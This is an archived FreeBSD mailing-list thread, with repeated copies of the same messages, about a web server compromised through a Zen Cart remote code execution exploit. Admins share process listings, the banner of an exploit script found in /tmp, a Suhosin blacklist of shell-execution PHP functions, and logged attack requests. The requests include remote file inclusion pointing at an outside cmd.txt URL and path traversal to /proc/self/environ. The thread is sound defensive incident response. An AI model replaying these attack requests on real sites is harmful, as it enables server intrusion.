Re: Server compromised Zen-Cart record company Exploit
Replying to Bogdan Webb's reply recommending sohusin: This appears to be exactly what I needed, thanks! The stock ports PHP install already has the suhosin patch, but the extension is a godsend! Not only does it log everything, but it let's you manage php functions on a per virtual host basis, not just in php.ini. Fantastic and is working great. About the only thing I could want more would be to control the functions under the apache Directory directives (on top of in VirtualHost). On Mon, 1 Feb 2010, James Smallacombe wrote: (please reply-all; I am not sub'd and sorry for the top posting): I have safe_mode off due to popular demand. So many customer apps demand that it be kept off. In fact, here is a post from one of the Zen people on the Zen-cart forum. In light of this exploit, this might be a little ironic: http://www.zen-cart.com/forum/showthread.php?t=76740 There is one for-sure patch: Turn off safe-mode. Keep in mind that future versions of PHP will *not* even include a safe-mode ... because it's a weak bandage giving a false sense of security to hosts who don't otherwise know how to properly secure their servers. This begs the question: why? ie: why would you want to run your online business on a server that's got to use safe-mode in order to think they're securing the server? I'm not trying to badmouth your server administrator; rather I'm attempting to strongly make the point that unless safe-mode is being used for a very specific reason for which there is no other solution (an unlikely situation), it shouldn't be used. And, if it is being used, you shouldn't run your business there, because there will be other security issues to which you'll be vulnerable but never have a clue about it until disaster strikes, because the big picture of security protection has been poorly implemented. That said, Zen Cart will install and run even if Safe Mode is active; however, you run the risk of certain features not working with or without notice, and the unexpected appearance of warning or fatal errors while customers are using the site. And then there's the issue of the admin side needing to do various things that safe-mode doesn't like. So, I guess, in short ... you can do it, but you do so at your own risk. Maybe that's more than you wanted to hear ... sorry From: Bogdan Webb bog...@pgn.ro try php's safe_mode but it is likely to keep the hackers off, indeed they can get in and snatch some data but they would be kept out of a shell's reach... but sometimes safe_mode is not enough... try considering Suhosin but the addon not the patch... and define the suhosin.executor.func.blacklist witch will deny use of certain php commands that allow shell execution... but keep in mind it's impossible to prevent all breaches... this php patch will only keep the hacker kiddos off but there's still a good chance it can be broken... stay safe ! ref's: http://www.hardened-php.net/suhosin.127.html http://beta.pgn.ro/phps/phpinfo.php On Sun, 31 Jan 2010, James Smallacombe wrote: Whoever speculated that my server may have been compromised was on to something (see bottom). The good news is, it does appear to be contained to the www unpriveleged user (with no shell). The bad news is, they can still cause a lot of trouble. I found the compromised customer site and chmod 0 their cart (had php binaries called core(some number).php that gave the hacker a nice browser screen to cause all kinds of trouble) Not sure if this is related to the UDP floods, but if not, it's a heck of a coincidence. At times, CPU went through the roof for the www user, mostly running some sort of perl scripts (nothing in the suexec-log). I would kill apache, but couldn't restart it as it would show port 80 in use. I would have to manually kill processes like these: www 70471 1.4 0.1 6056 3824 ?? R 4:21PM 0:44.75 [eth0] (perl) www 70470 1.2 0.1 6060 3828 ?? R 4:21PM 0:44.50 [bash] (perl) www 64779 1.0 0.1 6056 3820 ?? R 4:07PM 2:24.34 /sbin/klogd -c 1 -x -x (perl) www 70472 1.0 0.1 6060 3828 ?? R 4:21PM 0:44.84 I could not find ANY file named klogd on the system, let alone in /sbin. Clues as to how to dig myself out of this are appreciated I found this in /tmp/bx1.txt: --More--(5%)#!/usr/bin/php ?php # # --- Zen Cart 1.3.8 Remote Code Execution # http://www.zen-cart.com/ # Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! # A new version (1.3.8a) is avaible on http://www.zen-cart.com/ # # BlackH :) # error_reporting(E_ALL ^ E_NOTICE); if($argc 2) { echo =___ Zen Cart 1.3.8 Remote Code Execution Exploit = | BlackH bl4c...@gmail.com | |
Re: Server compromised Zen-Cart record company Exploit
try php's safe_mode but it is likely to keep the hackers off, indeed they can get in and snatch some data but they would be kept out of a shell's reach... but sometimes safe_mode is not enough... try considering Suhosin but the addon not the patch... and define the suhosin.executor.func.blacklist witch will deny use of certain php commands that allow shell execution... but keep in mind it's impossible to prevent all breaches... this php patch will only keep the hacker kiddos off but there's still a good chance it can be broken... stay safe ! ref's: http://www.hardened-php.net/suhosin.127.html http://beta.pgn.ro/phps/phpinfo.php 2010/1/31 James Smallacombe u...@3.am Whoever speculated that my server may have been compromised was on to something (see bottom). The good news is, it does appear to be contained to the www unpriveleged user (with no shell). The bad news is, they can still cause a lot of trouble. I found the compromised customer site and chmod 0 their cart (had php binaries called core(some number).php that gave the hacker a nice browser screen to cause all kinds of trouble) Not sure if this is related to the UDP floods, but if not, it's a heck of a coincidence. At times, CPU went through the roof for the www user, mostly running some sort of perl scripts (nothing in the suexec-log). I would kill apache, but couldn't restart it as it would show port 80 in use. I would have to manually kill processes like these: www 70471 1.4 0.1 6056 3824 ?? R 4:21PM 0:44.75 [eth0] (perl) www 70470 1.2 0.1 6060 3828 ?? R 4:21PM 0:44.50 [bash] (perl) www 64779 1.0 0.1 6056 3820 ?? R 4:07PM 2:24.34 /sbin/klogd -c 1 -x -x (perl) www 70472 1.0 0.1 6060 3828 ?? R 4:21PM 0:44.84 I could not find ANY file named klogd on the system, let alone in /sbin. Clues as to how to dig myself out of this are appreciated I found this in /tmp/bx1.txt: --More--(5%)#!/usr/bin/php ?php # # --- Zen Cart 1.3.8 Remote Code Execution # http://www.zen-cart.com/ # Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! # A new version (1.3.8a) is avaible on http://www.zen-cart.com/ # # BlackH :) # error_reporting(E_ALL ^ E_NOTICE); if($argc 2) { echo =___ Zen Cart 1.3.8 Remote Code Execution Exploit = | BlackH bl4c...@gmail.com | | | | \$system php $argv[0] url| | Notes: url ex: http://victim.com/site (no slash) | | | ;exit(1); --- snipped -- It is dated from two nights ago, after these issues started, but it's nonetheless larming. Security Focus is aware of the issue and refers you to Zen for the fix. Only problem is, this is an old version of Zen cart, and the James Smallacombe PlantageNet, Inc. CEO and Janitor u...@3.am http://3.am = ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Server compromised Zen-Cart record company Exploit
Bogdan Webb wrote: try php's safe_mode but it is likely to keep the hackers off, indeed they can get in and snatch some data but they would be kept out of a shell's reach... but sometimes safe_mode is not enough... try considering Suhosin but the addon not the patch... and define the suhosin.executor.func.blacklist witch will deny use of certain php commands that allow shell execution... but keep in mind it's impossible to prevent all breaches... this php patch will only keep the hacker kiddos off but there's still a good chance it can be broken... stay safe ! ref's: http://www.hardened-php.net/suhosin.127.html http://beta.pgn.ro/phps/phpinfo.php 2010/1/31 James Smallacombe u...@3.am Whoever speculated that my server may have been compromised was on to something (see bottom). The good news is, it does appear to be contained to the www unpriveleged user (with no shell). The bad news is, they can still cause a lot of trouble. I found the compromised customer site and chmod 0 their cart (had php binaries called core(some number).php that gave the hacker a nice browser screen to cause all kinds of trouble) Not sure if this is related to the UDP floods, but if not, it's a heck of a coincidence. At times, CPU went through the roof for the www user, mostly running some sort of perl scripts (nothing in the suexec-log). I would kill apache, but couldn't restart it as it would show port 80 in use. I would have to manually kill processes like these: www 70471 1.4 0.1 6056 3824 ?? R 4:21PM 0:44.75 [eth0] (perl) www 70470 1.2 0.1 6060 3828 ?? R 4:21PM 0:44.50 [bash] (perl) www 64779 1.0 0.1 6056 3820 ?? R 4:07PM 2:24.34 /sbin/klogd -c 1 -x -x (perl) www 70472 1.0 0.1 6060 3828 ?? R 4:21PM 0:44.84 I could not find ANY file named klogd on the system, let alone in /sbin. Clues as to how to dig myself out of this are appreciated I found this in /tmp/bx1.txt: --More--(5%)#!/usr/bin/php ?php # # --- Zen Cart 1.3.8 Remote Code Execution # http://www.zen-cart.com/ # Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! # A new version (1.3.8a) is avaible on http://www.zen-cart.com/ # # BlackH :) # error_reporting(E_ALL ^ E_NOTICE); if($argc 2) { echo =___ Zen Cart 1.3.8 Remote Code Execution Exploit = | BlackH bl4c...@gmail.com | | | | \$system php $argv[0] url| | Notes: url ex: http://victim.com/site (no slash) | | | ;exit(1); --- snipped -- It is dated from two nights ago, after these issues started, but it's nonetheless larming. Security Focus is aware of the issue and refers you to Zen for the fix. Only problem is, this is an old version of Zen cart, and the James Smallacombe PlantageNet, Inc. CEO and Janitor u...@3.am http://3.am = ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org check out port mod_security for apache31 and mod_security2 for apache22 ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Server compromised Zen-Cart record company Exploit
(please reply-all; I am not sub'd and sorry for the top posting): I have safe_mode off due to popular demand. So many customer apps demand that it be kept off. In fact, here is a post from one of the Zen people on the Zen-cart forum. In light of this exploit, this might be a little ironic: http://www.zen-cart.com/forum/showthread.php?t=76740 There is one for-sure patch: Turn off safe-mode. Keep in mind that future versions of PHP will *not* even include a safe-mode ... because it's a weak bandage giving a false sense of security to hosts who don't otherwise know how to properly secure their servers. This begs the question: why? ie: why would you want to run your online business on a server that's got to use safe-mode in order to think they're securing the server? I'm not trying to badmouth your server administrator; rather I'm attempting to strongly make the point that unless safe-mode is being used for a very specific reason for which there is no other solution (an unlikely situation), it shouldn't be used. And, if it is being used, you shouldn't run your business there, because there will be other security issues to which you'll be vulnerable but never have a clue about it until disaster strikes, because the big picture of security protection has been poorly implemented. That said, Zen Cart will install and run even if Safe Mode is active; however, you run the risk of certain features not working with or without notice, and the unexpected appearance of warning or fatal errors while customers are using the site. And then there's the issue of the admin side needing to do various things that safe-mode doesn't like. So, I guess, in short ... you can do it, but you do so at your own risk. Maybe that's more than you wanted to hear ... sorry From: Bogdan Webb bog...@pgn.ro try php's safe_mode but it is likely to keep the hackers off, indeed they can get in and snatch some data but they would be kept out of a shell's reach... but sometimes safe_mode is not enough... try considering Suhosin but the addon not the patch... and define the suhosin.executor.func.blacklist witch will deny use of certain php commands that allow shell execution... but keep in mind it's impossible to prevent all breaches... this php patch will only keep the hacker kiddos off but there's still a good chance it can be broken... stay safe ! ref's: http://www.hardened-php.net/suhosin.127.html http://beta.pgn.ro/phps/phpinfo.php On Sun, 31 Jan 2010, James Smallacombe wrote: Whoever speculated that my server may have been compromised was on to something (see bottom). The good news is, it does appear to be contained to the www unpriveleged user (with no shell). The bad news is, they can still cause a lot of trouble. I found the compromised customer site and chmod 0 their cart (had php binaries called core(some number).php that gave the hacker a nice browser screen to cause all kinds of trouble) Not sure if this is related to the UDP floods, but if not, it's a heck of a coincidence. At times, CPU went through the roof for the www user, mostly running some sort of perl scripts (nothing in the suexec-log). I would kill apache, but couldn't restart it as it would show port 80 in use. I would have to manually kill processes like these: www 70471 1.4 0.1 6056 3824 ?? R 4:21PM 0:44.75 [eth0] (perl) www 70470 1.2 0.1 6060 3828 ?? R 4:21PM 0:44.50 [bash] (perl) www 64779 1.0 0.1 6056 3820 ?? R 4:07PM 2:24.34 /sbin/klogd -c 1 -x -x (perl) www 70472 1.0 0.1 6060 3828 ?? R 4:21PM 0:44.84 I could not find ANY file named klogd on the system, let alone in /sbin. Clues as to how to dig myself out of this are appreciated I found this in /tmp/bx1.txt: --More--(5%)#!/usr/bin/php ?php # # --- Zen Cart 1.3.8 Remote Code Execution # http://www.zen-cart.com/ # Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! # A new version (1.3.8a) is avaible on http://www.zen-cart.com/ # # BlackH :) # error_reporting(E_ALL ^ E_NOTICE); if($argc 2) { echo =___ Zen Cart 1.3.8 Remote Code Execution Exploit = | BlackH bl4c...@gmail.com | | | | \$system php $argv[0] url| | Notes: url ex: http://victim.com/site (no slash) | | | ;exit(1); --- snipped -- It is dated from two nights ago, after these issues started, but it's nonetheless larming. Security Focus is aware of the issue and refers you to Zen for the fix. Only problem is,
Re: Server compromised Zen-Cart record company Exploit
Indeed it's pretty tricky with safe_mode, like for certain i know that a version of a popular r57 shell had safe_mode bypass - i was stunned to check the shell myself on my server... and i was thinking that safe_mode is enough... (+ i was using the suhoshin patch *witch in fact does nothing regarding straightening the php) then i came over suhoshin the addon (witch on my BSD with lighttpd it could be loaded only using Zen framework... for unknown reasons to me) the suhoshin was configured to blacklist some basic commands that allow php to directly run shell commands: suhosin.executor.func.blacklist = proc_nice,shell_exec,show_source,symlink,system,dl,highlight_file,ini_alter,ini_restore,openlog,passthru,exec thus even if hackers find bugs in some php apps it would be harder to get a shell... i say harder because it's impossible to prevent that - there are mysql ways to get shell and so on ... so it's not 100% foolproof, but it's here's some examples on how suhoshin alerts the attacks: Jan 2 02:17:00 pgn suhosin[75216]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '91.121.75.82', file '/usr/home//pgnlinks/index.php') Dec 16 23:43:36 pgn suhosin[87560]: ALERT - function within blacklist called: shell_exec() (attacker '86.122.161.162', file '/usr/home//pvpwww/junkforum/Sources/Subs.php', line 3531) *note - these are logs from /var/log/messages and the last message is a false-positive (i thinks it's called that way) it's a basic function of SMF board to check the DNS with a linux command, but i just wanted to point out how it handles the blacklist... here's a more detailed info regarding attacks (attempts) stored in the webserver's log file (in my case lighttpd): 2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'list' (attacker '189.26.208.35', file '/usr/home//pgnlinks/index.php') 2010-01-19 02:21:54: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'c' (attacker '189.26.208.35', file '/usr/home//pgnlinks/index.php') 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET /index.php?list=http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 302 0 - Mozilla/3.0 (compatible; Indy Library) 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET /index.php?c= http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 200 3304 - Mozilla/3.0 (compatible; Indy Library) 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:53 +0200] GET /index.php?list=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1 200 3307 - Mozilla/3.0 (compatible; Indy Library) 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:54 +0200] GET /index.php?c=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1 200 3306 - Mozilla/3.0 (compatible; Indy Library) My server has safe_mode off - bcoz it's not needed (at least in my mind... i might be mistaking) and check out the phpinfo.php file i've got and see the suhoshin settings stay safe! ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Server compromised Zen-Cart record company Exploit
Whoever speculated that my server may have been compromised was on to something (see bottom). The good news is, it does appear to be contained to the www unpriveleged user (with no shell). The bad news is, they can still cause a lot of trouble. I found the compromised customer site and chmod 0 their cart (had php binaries called core(some number).php that gave the hacker a nice browser screen to cause all kinds of trouble) Not sure if this is related to the UDP floods, but if not, it's a heck of a coincidence. At times, CPU went through the roof for the www user, mostly running some sort of perl scripts (nothing in the suexec-log). I would kill apache, but couldn't restart it as it would show port 80 in use. I would have to manually kill processes like these: www 70471 1.4 0.1 6056 3824 ?? R 4:21PM 0:44.75 [eth0] (perl) www 70470 1.2 0.1 6060 3828 ?? R 4:21PM 0:44.50 [bash] (perl) www 64779 1.0 0.1 6056 3820 ?? R 4:07PM 2:24.34 /sbin/klogd -c 1 -x -x (perl) www 70472 1.0 0.1 6060 3828 ?? R 4:21PM 0:44.84 I could not find ANY file named klogd on the system, let alone in /sbin. Clues as to how to dig myself out of this are appreciated I found this in /tmp/bx1.txt: --More--(5%)#!/usr/bin/php ?php # # --- Zen Cart 1.3.8 Remote Code Execution # http://www.zen-cart.com/ # Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! # A new version (1.3.8a) is avaible on http://www.zen-cart.com/ # # BlackH :) # error_reporting(E_ALL ^ E_NOTICE); if($argc 2) { echo =___ Zen Cart 1.3.8 Remote Code Execution Exploit = | BlackH bl4c...@gmail.com | | | | \$system php $argv[0] url| | Notes: url ex: http://victim.com/site (no slash) | | | ;exit(1); --- snipped -- It is dated from two nights ago, after these issues started, but it's nonetheless larming. Security Focus is aware of the issue and refers you to Zen for the fix. Only problem is, this is an old version of Zen cart, and the James Smallacombe PlantageNet, Inc. CEO and Janitor u...@3.am http://3.am = ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org